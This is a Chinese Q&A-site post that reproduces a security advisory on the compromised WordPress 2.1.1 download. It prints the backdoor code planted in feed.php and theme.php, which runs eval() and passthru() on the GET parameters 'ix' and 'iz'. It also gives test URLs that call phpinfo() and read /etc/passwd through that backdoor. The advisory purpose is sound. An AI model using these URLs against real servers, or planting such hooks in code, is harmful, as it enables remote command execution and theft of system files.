Wordpress 2.1.1远程命令执行后门漏洞

发布网友 发布时间:2022-04-22 09:14

我来回答

1个回答

热心网友 时间:2023-11-02 19:46

他受影响系统是:
WordPress WordPress 2.1.1
描述:
BUGTRAQ ID: 22797

WordPress是一款免费的论坛Blog系统。

WordPress提供软件下载的网站被入侵,入侵者修改了软件代码码植入远程可执行命令的后门,远程攻击者可能利用这个后门以Web进程权限在安装了恶意版本WordPress的服务器上执行任意命令。

被修改的文件是wp-includes/feed.php和wp-includes/theme.php,被添加了如下代码:

在wp-includes/feed.php文件中:

function comment_text_phpfilter($filterdata) {
eval($filterdata);
}
...
if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }

eval()调用会执行通过ix变量传入的PHP代码。

在wp-includes/theme.php文件中:

function get_theme_mcommand($mcds) {
passthru($mcds);
}
...
if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }

passthru()会执行通过iz变量传入的PHP代码。

<*来源:Ivan Fratric

链接:http://secunia.com/advisories/24374/
http://wordpress.org/development/2007/03/upgrade-212/
http://ifsec.blogspot.com/2007/03/wordpress-code-compromised-to-enable.html
*>

测试方法:
--------------------------------------------------------------------------------

提示:

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://wordpressurl/wp-includes/feed.php?ix=phpinfo()
http://wordpressurl/wp-includes/theme.php?iz=cat/etc/passwd

声明声明:本网页内容为用户发布,旨在传播知识,不代表本网认同其观点,若有侵权等问题请及时与本网联系,我们将在第一时间删除处理。E-MAIL:11247931@qq.com